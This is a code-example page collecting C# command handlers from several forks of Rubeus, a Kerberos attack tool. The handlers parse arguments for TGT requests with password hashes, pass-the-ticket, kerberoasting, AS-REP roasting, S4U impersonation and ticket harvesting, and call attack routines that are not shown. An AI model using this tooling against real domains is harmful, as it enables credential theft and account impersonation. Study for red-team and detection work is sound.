コード例 #1
0
 public void Execute(Dictionary <string, string> arguments)
 {
     if (arguments.ContainsKey("/program"))
     {
         LSA.CreateProcessNetOnly(arguments["/program"], arguments.ContainsKey("/show"));
     }
     else
     {
         Console.WriteLine("\r\n[X] A /program needs to be supplied!\r\n");
     }
 }
コード例 #2
0
ファイル: Asktgt.cs プロジェクト: subi3wr3x/Rubeus
        public void Execute(Dictionary <string, string> arguments)
        {
            string user     = "";
            string domain   = "";
            string password = "";
            string hash     = "";
            string dc       = "";
            bool   ptt      = false;

            Interop.LUID       luid    = new Interop.LUID();
            Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial;

            if (arguments.ContainsKey("/user"))
            {
                string[] parts = arguments["/user"].Split('\\');
                if (parts.Length == 2)
                {
                    domain = parts[0];
                    user   = parts[1];
                }
                else
                {
                    user = arguments["/user"];
                }
            }
            if (arguments.ContainsKey("/domain"))
            {
                domain = arguments["/domain"];
            }
            if (arguments.ContainsKey("/dc"))
            {
                dc = arguments["/dc"];
            }
            if (arguments.ContainsKey("/password"))
            {
                password = arguments["/password"];
                if (arguments.ContainsKey("/enctype") && arguments["/enctype"].ToUpper().Equals("AES256"))
                {
                    encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;

                    // compute AES key from pwd
                    byte[] password_bytes = System.Text.Encoding.UTF8.GetBytes(password);
                    byte[] salt           = System.Text.Encoding.UTF8.GetBytes(domain.ToUpper() + user);

                    byte[] aes256_key = Crypto.ComputeAES256KerberosKey(password_bytes, salt);
                    hash = System.BitConverter.ToString(aes256_key).Replace("-", "");
                }
                else // default is RC4
                {
                    // compute NTLM from pwd
                    encType = Interop.KERB_ETYPE.rc4_hmac;
                    byte[] ntlm = Crypto.ComputeRC4KerberosKey(password); // a.k.a NTLM
                    hash = System.BitConverter.ToString(ntlm).Replace("-", "");
                }
            }
            if (arguments.ContainsKey("/rc4"))
            {
                hash    = arguments["/rc4"];
                encType = Interop.KERB_ETYPE.rc4_hmac;
            }
            if (arguments.ContainsKey("/aes256"))
            {
                hash    = arguments["/aes256"];
                encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
            }
            if (arguments.ContainsKey("/ptt"))
            {
                ptt = true;
            }

            if (arguments.ContainsKey("/luid"))
            {
                try
                {
                    luid = new Interop.LUID(arguments["/luid"]);
                }
                catch
                {
                    Console.WriteLine("[X] Invalid LUID format ({0})\r\n", arguments["/luid"]);
                    return;
                }
            }

            if (arguments.ContainsKey("/createnetonly"))
            {
                // if we're starting a hidden process to apply the ticket to
                if (!Helpers.IsHighIntegrity())
                {
                    Console.WriteLine("[X] You need to be in high integrity to apply a ticket to created logon session");
                    return;
                }
                if (arguments.ContainsKey("/show"))
                {
                    luid = LSA.CreateProcessNetOnly(arguments["/createnetonly"], true);
                }
                else
                {
                    luid = LSA.CreateProcessNetOnly(arguments["/createnetonly"], false);
                }
                Console.WriteLine();
            }

            if (String.IsNullOrEmpty(user))
            {
                Console.WriteLine("\r\n[X] You must supply a user name!\r\n");
                return;
            }
            if (String.IsNullOrEmpty(domain))
            {
                domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
            }
            if (String.IsNullOrEmpty(hash))
            {
                Console.WriteLine("\r\n[X] You must supply a /password or /rc4 hash or /aes256 hash!\r\n");
                return;
            }

            if (!((encType == Interop.KERB_ETYPE.rc4_hmac) || (encType == Interop.KERB_ETYPE.aes256_cts_hmac_sha1)))
            {
                Console.WriteLine("\r\n[X] Only /rc4 and /aes256 are supported at this time.\r\n");
                return;
            }
            else
            {
                Ask.TGT(user, domain, hash, encType, ptt, dc, luid);
                return;
            }
        }
コード例 #3
0
ファイル: Asktgt.cs プロジェクト: mlynchcogent/Covenant
        public void Execute(Dictionary <string, string> arguments)
        {
            string user     = "";
            string domain   = "";
            string password = "";
            string hash     = "";
            string dc       = "";
            bool   ptt      = false;

            Interop.LUID       luid    = new Interop.LUID();
            Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial;

            if (arguments.ContainsKey("/user"))
            {
                string[] parts = arguments["/user"].Split('\\');
                if (parts.Length == 2)
                {
                    domain = parts[0];
                    user   = parts[1];
                }
                else
                {
                    user = arguments["/user"];
                }
            }
            if (arguments.ContainsKey("/domain"))
            {
                domain = arguments["/domain"];
            }
            if (arguments.ContainsKey("/dc"))
            {
                dc = arguments["/dc"];
            }

            if (arguments.ContainsKey("/password"))
            {
                password = arguments["/password"];

                string salt = String.Format("{0}{1}", domain.ToUpper(), user.ToLower());
                encType = Interop.KERB_ETYPE.rc4_hmac; //default is non /enctype is specified

                if (arguments.ContainsKey("/enctype"))
                {
                    string encTypeString = arguments["/enctype"].ToUpper();

                    if (encTypeString.Equals("RC4") || encTypeString.Equals("NTLM"))
                    {
                        encType = Interop.KERB_ETYPE.rc4_hmac;
                    }
                    else if (encTypeString.Equals("AES128"))
                    {
                        encType = Interop.KERB_ETYPE.aes128_cts_hmac_sha1;
                    }
                    else if (encTypeString.Equals("AES256") || encTypeString.Equals("AES"))
                    {
                        encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
                    }
                    else if (encTypeString.Equals("DES"))
                    {
                        encType = Interop.KERB_ETYPE.des_cbc_md5;
                    }
                }
                hash = Crypto.KerberosPasswordHash(encType, password, salt);
            }

            else if (arguments.ContainsKey("/des"))
            {
                hash    = arguments["/des"];
                encType = Interop.KERB_ETYPE.des_cbc_md5;
            }
            else if (arguments.ContainsKey("/rc4"))
            {
                hash    = arguments["/rc4"];
                encType = Interop.KERB_ETYPE.rc4_hmac;
            }
            else if (arguments.ContainsKey("/ntlm"))
            {
                hash    = arguments["/ntlm"];
                encType = Interop.KERB_ETYPE.rc4_hmac;
            }
            else if (arguments.ContainsKey("/aes128"))
            {
                hash    = arguments["/aes128"];
                encType = Interop.KERB_ETYPE.aes128_cts_hmac_sha1;
            }
            else if (arguments.ContainsKey("/aes256"))
            {
                hash    = arguments["/aes256"];
                encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
            }

            if (arguments.ContainsKey("/ptt"))
            {
                ptt = true;
            }

            if (arguments.ContainsKey("/luid"))
            {
                try
                {
                    luid = new Interop.LUID(arguments["/luid"]);
                }
                catch
                {
                    Console.WriteLine("[X] Invalid LUID format ({0})\r\n", arguments["/luid"]);
                    return;
                }
            }

            if (arguments.ContainsKey("/createnetonly"))
            {
                // if we're starting a hidden process to apply the ticket to
                if (!Helpers.IsHighIntegrity())
                {
                    Console.WriteLine("[X] You need to be in high integrity to apply a ticket to created logon session");
                    return;
                }
                if (arguments.ContainsKey("/show"))
                {
                    luid = LSA.CreateProcessNetOnly(arguments["/createnetonly"], true);
                }
                else
                {
                    luid = LSA.CreateProcessNetOnly(arguments["/createnetonly"], false);
                }
                Console.WriteLine();
            }

            if (String.IsNullOrEmpty(user))
            {
                Console.WriteLine("\r\n[X] You must supply a user name!\r\n");
                return;
            }
            if (String.IsNullOrEmpty(domain))
            {
                domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
            }
            if (String.IsNullOrEmpty(hash))
            {
                Console.WriteLine("\r\n[X] You must supply a /password , or a [/des|/rc4|/aes128|/aes256] hash!\r\n");
                return;
            }

            if (!((encType == Interop.KERB_ETYPE.des_cbc_md5) || (encType == Interop.KERB_ETYPE.rc4_hmac) || (encType == Interop.KERB_ETYPE.aes128_cts_hmac_sha1) || (encType == Interop.KERB_ETYPE.aes256_cts_hmac_sha1)))
            {
                Console.WriteLine("\r\n[X] Only /des, /rc4, /aes128, and /aes256 are supported at this time.\r\n");
                return;
            }
            else
            {
                Ask.TGT(user, domain, hash, encType, ptt, dc, luid, true);
                return;
            }
        }
コード例 #4
0
ファイル: Asktgt.cs プロジェクト: BlueSkeye/RubeusSxS
        public void Execute(Dictionary <string, string> arguments)
        {
            string user = "";
            uint   luid = 0;

            string domain;
            string userValue;

            if (arguments.TryGetValue("/user", out userValue))
            {
                string[] parts = userValue.Split('\\');
                switch (parts.Length)
                {
                case 1:
                    user = userValue;
                    break;

                case 2:
                    domain = parts[0];
                    user   = parts[1];
                    break;

                default:
                    Console.WriteLine("\r\n[X] Invalid user value syntax.\r\n");
                    return;
                }
            }
            // TODO : Clarify in source code for overlap with composite user name.
            if (!arguments.TryGetValue("/domain", out domain))
            {
                domain = string.Empty;
            }
            string dc;

            if (!arguments.TryGetValue("/dc", out dc))
            {
                dc = string.Empty;
            }
            Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial;
            string             hash;

            if (arguments.TryGetValue("/rc4", out hash))
            {
                encType = Interop.KERB_ETYPE.rc4_hmac;
            }
            else if (arguments.TryGetValue("/aes256", out hash))
            {
                encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
            }
            if (string.IsNullOrEmpty(hash))
            {
                Console.WriteLine("\r\n[X] You must supply a /rc4 or /aes256 hash!\r\n");
                return;
            }

            bool   ptt = arguments.ContainsKey("/ptt");
            string luidValue;

            if (arguments.TryGetValue("/luid", out luidValue))
            {
                try {
                    luid = uint.Parse(luidValue);
                }
                catch {
                    try {
                        luid = Convert.ToUInt32(luidValue, 16);
                    }
                    catch {
                        Console.WriteLine("[X] Invalid LUID format ({0})\r\n", luidValue);
                        return;
                    }
                }
            }

            string createnetonlyValue;

            if (arguments.TryGetValue("/createnetonly", out createnetonlyValue))
            {
                // if we're starting a hidden process to apply the ticket to
                if (!Helpers.IsHighIntegrity())
                {
                    Console.WriteLine("[X] You need to be in high integrity to apply a ticket to created logon session");
                    return;
                }
                luid = LSA.CreateProcessNetOnly(createnetonlyValue, arguments.ContainsKey("/show"));
                Console.WriteLine();
            }
            if (string.IsNullOrEmpty(user))
            {
                Console.WriteLine("\r\n[X] You must supply a user name!\r\n");
                return;
            }
            if (string.IsNullOrEmpty(domain))
            {
                domain = IPGlobalProperties.GetIPGlobalProperties().DomainName;
            }
            if (!((encType == Interop.KERB_ETYPE.rc4_hmac) || (encType == Interop.KERB_ETYPE.aes256_cts_hmac_sha1)))
            {
                Console.WriteLine("\r\n[X] Only /rc4 and /aes256 are supported at this time.\r\n");
                return;
            }
            Ask.TGT(user, domain, hash, encType, ptt, dc, luid);
            return;
        }
コード例 #5
0
ファイル: Program.cs プロジェクト: sbousseaden/Rubeus
        static void Main(string[] args)
        {
            Logo();

            var arguments = new Dictionary <string, string>();

            foreach (string argument in args)
            {
                int idx = argument.IndexOf(':');
                if (idx > 0)
                {
                    arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1);
                }
                else
                {
                    arguments[argument] = "";
                }
            }

            if (arguments.ContainsKey("asktgt"))
            {
                string             user    = "";
                string             domain  = "";
                string             hash    = "";
                string             dc      = "";
                bool               ptt     = false;
                uint               luid    = 0;
                Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial;

                if (arguments.ContainsKey("/user"))
                {
                    user = arguments["/user"];
                }
                if (arguments.ContainsKey("/domain"))
                {
                    domain = arguments["/domain"];
                }
                if (arguments.ContainsKey("/dc"))
                {
                    dc = arguments["/dc"];
                }
                if (arguments.ContainsKey("/rc4"))
                {
                    hash    = arguments["/rc4"];
                    encType = Interop.KERB_ETYPE.rc4_hmac;
                }
                if (arguments.ContainsKey("/aes256"))
                {
                    hash    = arguments["/aes256"];
                    encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
                }
                if (arguments.ContainsKey("/ptt"))
                {
                    ptt = true;
                }

                if (arguments.ContainsKey("/luid"))
                {
                    try
                    {
                        luid = UInt32.Parse(arguments["/luid"]);
                    }
                    catch
                    {
                        try
                        {
                            luid = Convert.ToUInt32(arguments["/luid"], 16);
                        }
                        catch
                        {
                            Console.WriteLine("[X] Invalid LUID format ({0})\r\n", arguments["/LUID"]);
                            return;
                        }
                    }
                }


                if (arguments.ContainsKey("/createnetonly"))
                {
                    // if we're starting a hidden process to apply the ticket to
                    if (!Helpers.IsHighIntegrity())
                    {
                        Console.WriteLine("[X] You need to be in high integrity to apply a ticket to created logon session");
                        return;
                    }
                    if (arguments.ContainsKey("/show"))
                    {
                        luid = LSA.CreateProcessNetOnly(arguments["/createnetonly"], true);
                    }
                    else
                    {
                        luid = LSA.CreateProcessNetOnly(arguments["/createnetonly"], false);
                    }
                    Console.WriteLine();
                }

                if (String.IsNullOrEmpty(user))
                {
                    Console.WriteLine("\r\n[X] You must supply a user name!\r\n");
                    return;
                }
                if (String.IsNullOrEmpty(domain))
                {
                    domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
                }
                if (String.IsNullOrEmpty(hash))
                {
                    Console.WriteLine("\r\n[X] You must supply a /rc4 or /aes256 hash!\r\n");
                    return;
                }

                if (!((encType == Interop.KERB_ETYPE.rc4_hmac) || (encType == Interop.KERB_ETYPE.aes256_cts_hmac_sha1)))
                {
                    Console.WriteLine("\r\n[X] Only /rc4 and /aes256 are supported at this time.\r\n");
                    return;
                }
                else
                {
                    Ask.TGT(user, domain, hash, encType, ptt, dc, luid);
                    return;
                }
            }

            if (arguments.ContainsKey("renew"))
            {
                bool   ptt = false;
                string dc  = "";

                if (arguments.ContainsKey("/ptt"))
                {
                    ptt = true;
                }

                if (arguments.ContainsKey("/dc"))
                {
                    dc = arguments["/dc"];
                }

                if (arguments.ContainsKey("/ticket"))
                {
                    string kirbi64 = arguments["/ticket"];

                    if (Helpers.IsBase64String(kirbi64))
                    {
                        byte[]   kirbiBytes = Convert.FromBase64String(kirbi64);
                        KRB_CRED kirbi      = new KRB_CRED(kirbiBytes);
                        if (arguments.ContainsKey("/autorenew"))
                        {
                            // if we want to auto-renew the TGT up until the renewal limit
                            Renew.TGTAutoRenew(kirbi, dc);
                        }
                        else
                        {
                            // otherwise a single renew operation
                            byte[] blah = Renew.TGT(kirbi, ptt, dc);
                        }
                    }
                    else if (File.Exists(kirbi64))
                    {
                        byte[]   kirbiBytes = File.ReadAllBytes(kirbi64);
                        KRB_CRED kirbi      = new KRB_CRED(kirbiBytes);
                        if (arguments.ContainsKey("/autorenew"))
                        {
                            // if we want to auto-renew the TGT up until the renewal limit
                            Renew.TGTAutoRenew(kirbi, dc);
                        }
                        else
                        {
                            // otherwise a single renew operation
                            byte[] blah = Renew.TGT(kirbi, ptt, dc);
                        }
                    }
                    else
                    {
                        Console.WriteLine("\r\n[X] /ticket:X must either be a .kirbi file or a base64 encoded .kirbi\r\n");
                    }
                    return;
                }
                else
                {
                    Console.WriteLine("\r\n[X] A base64 .kirbi file needs to be supplied for renewal!\r\n");
                    return;
                }
            }

            if (arguments.ContainsKey("s4u"))
            {
                string             targetUser = "";
                string             targetSPN  = "";
                string             altSname   = "";
                string             user       = "";
                string             domain     = "";
                string             hash       = "";
                bool               ptt        = false;
                string             dc         = "";
                Interop.KERB_ETYPE encType    = Interop.KERB_ETYPE.subkey_keymaterial;

                if (arguments.ContainsKey("/user"))
                {
                    user = arguments["/user"];
                }
                if (arguments.ContainsKey("/domain"))
                {
                    domain = arguments["/domain"];
                }
                if (arguments.ContainsKey("/ptt"))
                {
                    ptt = true;
                }
                if (arguments.ContainsKey("/dc"))
                {
                    dc = arguments["/dc"];
                }
                if (arguments.ContainsKey("/rc4"))
                {
                    hash    = arguments["/rc4"];
                    encType = Interop.KERB_ETYPE.rc4_hmac;
                }
                if (arguments.ContainsKey("/aes256"))
                {
                    hash    = arguments["/aes256"];
                    encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
                }
                if (arguments.ContainsKey("/impersonateuser"))
                {
                    targetUser = arguments["/impersonateuser"];
                }

                if (arguments.ContainsKey("/msdsspn"))
                {
                    targetSPN = arguments["/msdsspn"];
                }

                if (arguments.ContainsKey("/altservice"))
                {
                    altSname = arguments["/altservice"];
                }

                if (String.IsNullOrEmpty(targetUser))
                {
                    Console.WriteLine("\r\n[X] You must supply a /impersonateuser to impersonate!\r\n");
                    return;
                }
                if (String.IsNullOrEmpty(targetSPN))
                {
                    Console.WriteLine("\r\n[X] You must supply a /msdsspn !\r\n");
                    return;
                }

                if (arguments.ContainsKey("/ticket"))
                {
                    string kirbi64 = arguments["/ticket"];

                    if (Helpers.IsBase64String(kirbi64))
                    {
                        byte[]   kirbiBytes = Convert.FromBase64String(kirbi64);
                        KRB_CRED kirbi      = new KRB_CRED(kirbiBytes);
                        S4U.Execute(kirbi, targetUser, targetSPN, ptt, dc, altSname);
                    }
                    else if (File.Exists(kirbi64))
                    {
                        byte[]   kirbiBytes = File.ReadAllBytes(kirbi64);
                        KRB_CRED kirbi      = new KRB_CRED(kirbiBytes);
                        S4U.Execute(kirbi, targetUser, targetSPN, ptt, dc, altSname);
                    }
                    else
                    {
                        Console.WriteLine("\r\n[X] /ticket:X must either be a .kirbi file or a base64 encoded .kirbi\r\n");
                    }
                    return;
                }
                else if (arguments.ContainsKey("/user"))
                {
                    // if the user is supplying a user and rc4/aes256 hash to first execute a TGT request

                    user = arguments["/user"];

                    if (String.IsNullOrEmpty(hash))
                    {
                        Console.WriteLine("\r\n[X] You must supply a /rc4 or /aes256 hash!\r\n");
                        return;
                    }

                    S4U.Execute(user, domain, hash, encType, targetUser, targetSPN, ptt, dc, altSname);
                    return;
                }
                else
                {
                    Console.WriteLine("\r\n[X] A base64 .kirbi file needs to be supplied for S4U!");
                    Console.WriteLine("[X] Alternatively, supply a /user and </rc4:X | /aes256:X> hash to first retrieve a TGT.\r\n");
                    return;
                }
            }

            if (arguments.ContainsKey("ptt"))
            {
                uint luid = 0;
                if (arguments.ContainsKey("/luid"))
                {
                    try
                    {
                        luid = UInt32.Parse(arguments["/luid"]);
                    }
                    catch
                    {
                        try
                        {
                            luid = Convert.ToUInt32(arguments["/luid"], 16);
                        }
                        catch
                        {
                            Console.WriteLine("[X] Invalid LUID format ({0})\r\n", arguments["/LUID"]);
                            return;
                        }
                    }
                }

                if (arguments.ContainsKey("/ticket"))
                {
                    string kirbi64 = arguments["/ticket"];

                    if (Helpers.IsBase64String(kirbi64))
                    {
                        byte[] kirbiBytes = Convert.FromBase64String(kirbi64);
                        LSA.ImportTicket(kirbiBytes, luid);
                    }
                    else if (File.Exists(kirbi64))
                    {
                        byte[] kirbiBytes = File.ReadAllBytes(kirbi64);
                        LSA.ImportTicket(kirbiBytes, luid);
                    }
                    else
                    {
                        Console.WriteLine("\r\n[X]/ticket:X must either be a .kirbi file or a base64 encoded .kirbi\r\n");
                    }
                    return;
                }
                else
                {
                    Console.WriteLine("\r\n[X] A base64 .kirbi file needs to be supplied!\r\n");
                    return;
                }
            }

            if (arguments.ContainsKey("purge"))
            {
                uint luid = 0;
                if (arguments.ContainsKey("/luid"))
                {
                    try
                    {
                        luid = UInt32.Parse(arguments["/luid"]);
                    }
                    catch
                    {
                        try
                        {
                            luid = Convert.ToUInt32(arguments["/luid"], 16);
                        }
                        catch
                        {
                            Console.WriteLine("[X] Invalid LUID format ({0})\r\n", arguments["/LUID"]);
                            return;
                        }
                    }
                }

                LSA.Purge(luid);
            }

            else if (arguments.ContainsKey("kerberoast"))
            {
                string spn  = "";
                string user = "";
                string OU   = "";

                if (arguments.ContainsKey("/spn"))
                {
                    spn = arguments["/spn"];
                }
                if (arguments.ContainsKey("/user"))
                {
                    user = arguments["/user"];
                }
                if (arguments.ContainsKey("/ou"))
                {
                    OU = arguments["/ou"];
                }

                if (arguments.ContainsKey("/creduser"))
                {
                    if (!Regex.IsMatch(arguments["/creduser"], ".+\\.+", RegexOptions.IgnoreCase))
                    {
                        Console.WriteLine("\r\n[X] /creduser specification must be in fqdn format (domain.com\\user)\r\n");
                        return;
                    }

                    string[] parts      = arguments["/creduser"].Split('\\');
                    string   domainName = parts[0];
                    string   userName   = parts[1];

                    if (!arguments.ContainsKey("/credpassword"))
                    {
                        Console.WriteLine("\r\n[X] /credpassword is required when specifying /creduser\r\n");
                        return;
                    }

                    string password = arguments["/credpassword"];

                    System.Net.NetworkCredential cred = new System.Net.NetworkCredential(userName, password, domainName);

                    Roast.Kerberoast(spn, user, OU, cred);
                }
                else
                {
                    Roast.Kerberoast(spn, user, OU);
                }
            }

            else if (arguments.ContainsKey("asreproast"))
            {
                string user   = "";
                string domain = "";
                string dc     = "";

                if (arguments.ContainsKey("/user"))
                {
                    user = arguments["/user"];
                }
                if (arguments.ContainsKey("/domain"))
                {
                    domain = arguments["/domain"];
                }
                if (arguments.ContainsKey("/dc"))
                {
                    dc = arguments["/dc"];
                }

                if (String.IsNullOrEmpty(user))
                {
                    Console.WriteLine("\r\n[X] You must supply a user name!\r\n");
                    return;
                }
                if (String.IsNullOrEmpty(domain))
                {
                    domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
                }

                if (String.IsNullOrEmpty(dc))
                {
                    Roast.ASRepRoast(user, domain);
                }
                else
                {
                    Roast.ASRepRoast(user, domain, dc);
                }
            }

            else if (arguments.ContainsKey("dump"))
            {
                if (arguments.ContainsKey("/luid"))
                {
                    string service = "";
                    if (arguments.ContainsKey("/service"))
                    {
                        service = arguments["/service"];
                    }
                    UInt32 luid = 0;
                    try
                    {
                        luid = UInt32.Parse(arguments["/luid"]);
                    }
                    catch
                    {
                        try
                        {
                            luid = Convert.ToUInt32(arguments["/luid"], 16);
                        }
                        catch
                        {
                            Console.WriteLine("[X] Invalid LUID format ({0})\r\n", arguments["/LUID"]);
                            return;
                        }
                    }
                    LSA.ListKerberosTicketData(luid, service);
                }
                else if (arguments.ContainsKey("/service"))
                {
                    LSA.ListKerberosTicketData(0, arguments["/service"]);
                }
                else
                {
                    LSA.ListKerberosTicketData();
                }
            }

            else if (arguments.ContainsKey("monitor"))
            {
                string targetUser = "";
                int    interval   = 60;
                if (arguments.ContainsKey("/filteruser"))
                {
                    targetUser = arguments["/filteruser"];
                }
                if (arguments.ContainsKey("/interval"))
                {
                    interval = Int32.Parse(arguments["/interval"]);
                }
                Harvest.Monitor4624(interval, targetUser);
            }

            else if (arguments.ContainsKey("harvest"))
            {
                int intervalMinutes = 60;
                if (arguments.ContainsKey("/interval"))
                {
                    intervalMinutes = Int32.Parse(arguments["/interval"]);
                }
                Harvest.HarvestTGTs(intervalMinutes);
            }

            else if (arguments.ContainsKey("describe"))
            {
                if (arguments.ContainsKey("/ticket"))
                {
                    string kirbi64 = arguments["/ticket"];

                    if (Helpers.IsBase64String(kirbi64))
                    {
                        byte[]   kirbiBytes = Convert.FromBase64String(kirbi64);
                        KRB_CRED kirbi      = new KRB_CRED(kirbiBytes);
                        LSA.DisplayTicket(kirbi);
                    }
                    else if (File.Exists(kirbi64))
                    {
                        byte[]   kirbiBytes = File.ReadAllBytes(kirbi64);
                        KRB_CRED kirbi      = new KRB_CRED(kirbiBytes);
                        LSA.DisplayTicket(kirbi);
                    }
                    else
                    {
                        Console.WriteLine("\r\n[X] /ticket:X must either be a .kirbi file or a base64 encoded .kirbi\r\n");
                    }
                    return;
                }
                else
                {
                    Console.WriteLine("\r\n[X] A base64 .kirbi /ticket file needs to be supplied!\r\n");
                    return;
                }
            }

            else if (arguments.ContainsKey("createnetonly"))
            {
                if (arguments.ContainsKey("/program"))
                {
                    if (arguments.ContainsKey("/show"))
                    {
                        LSA.CreateProcessNetOnly(arguments["/program"], true);
                    }
                    else
                    {
                        LSA.CreateProcessNetOnly(arguments["/program"]);
                    }
                }

                else
                {
                    Console.WriteLine("\r\n[X] A /program needs to be supplied!\r\n");
                }
            }

            else
            {
                Usage();
            }
        }
コード例 #6
0
        public void Execute(Dictionary <string, string> arguments)
        {
            string user   = "";
            string domain = "";
            string hash   = "";
            string dc     = "";
            bool   ptt    = false;
            uint   luid   = 0;

            Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial;

            if (arguments.ContainsKey("/user"))
            {
                user = arguments["/user"];
            }
            if (arguments.ContainsKey("/domain"))
            {
                domain = arguments["/domain"];
            }
            if (arguments.ContainsKey("/dc"))
            {
                dc = arguments["/dc"];
            }
            if (arguments.ContainsKey("/rc4"))
            {
                hash    = arguments["/rc4"];
                encType = Interop.KERB_ETYPE.rc4_hmac;
            }
            if (arguments.ContainsKey("/aes256"))
            {
                hash    = arguments["/aes256"];
                encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
            }
            if (arguments.ContainsKey("/ptt"))
            {
                ptt = true;
            }

            if (arguments.ContainsKey("/luid"))
            {
                try
                {
                    luid = UInt32.Parse(arguments["/luid"]);
                }
                catch
                {
                    try
                    {
                        luid = Convert.ToUInt32(arguments["/luid"], 16);
                    }
                    catch
                    {
                        Console.WriteLine("[X] Invalid LUID format ({0})\r\n", arguments["/LUID"]);
                        return;
                    }
                }
            }

            if (arguments.ContainsKey("/createnetonly"))
            {
                // if we're starting a hidden process to apply the ticket to
                if (!Helpers.IsHighIntegrity())
                {
                    Console.WriteLine("[X] You need to be in high integrity to apply a ticket to created logon session");
                    return;
                }
                if (arguments.ContainsKey("/show"))
                {
                    luid = LSA.CreateProcessNetOnly(arguments["/createnetonly"], true);
                }
                else
                {
                    luid = LSA.CreateProcessNetOnly(arguments["/createnetonly"], false);
                }
                Console.WriteLine();
            }

            if (String.IsNullOrEmpty(user))
            {
                Console.WriteLine("\r\n[X] You must supply a user name!\r\n");
                return;
            }
            if (String.IsNullOrEmpty(domain))
            {
                domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
            }
            if (String.IsNullOrEmpty(hash))
            {
                Console.WriteLine("\r\n[X] You must supply a /rc4 or /aes256 hash!\r\n");
                return;
            }

            if (!((encType == Interop.KERB_ETYPE.rc4_hmac) || (encType == Interop.KERB_ETYPE.aes256_cts_hmac_sha1)))
            {
                Console.WriteLine("\r\n[X] Only /rc4 and /aes256 are supported at this time.\r\n");
                return;
            }
            else
            {
                Ask.TGT(user, domain, hash, encType, ptt, dc, luid);
                return;
            }
        }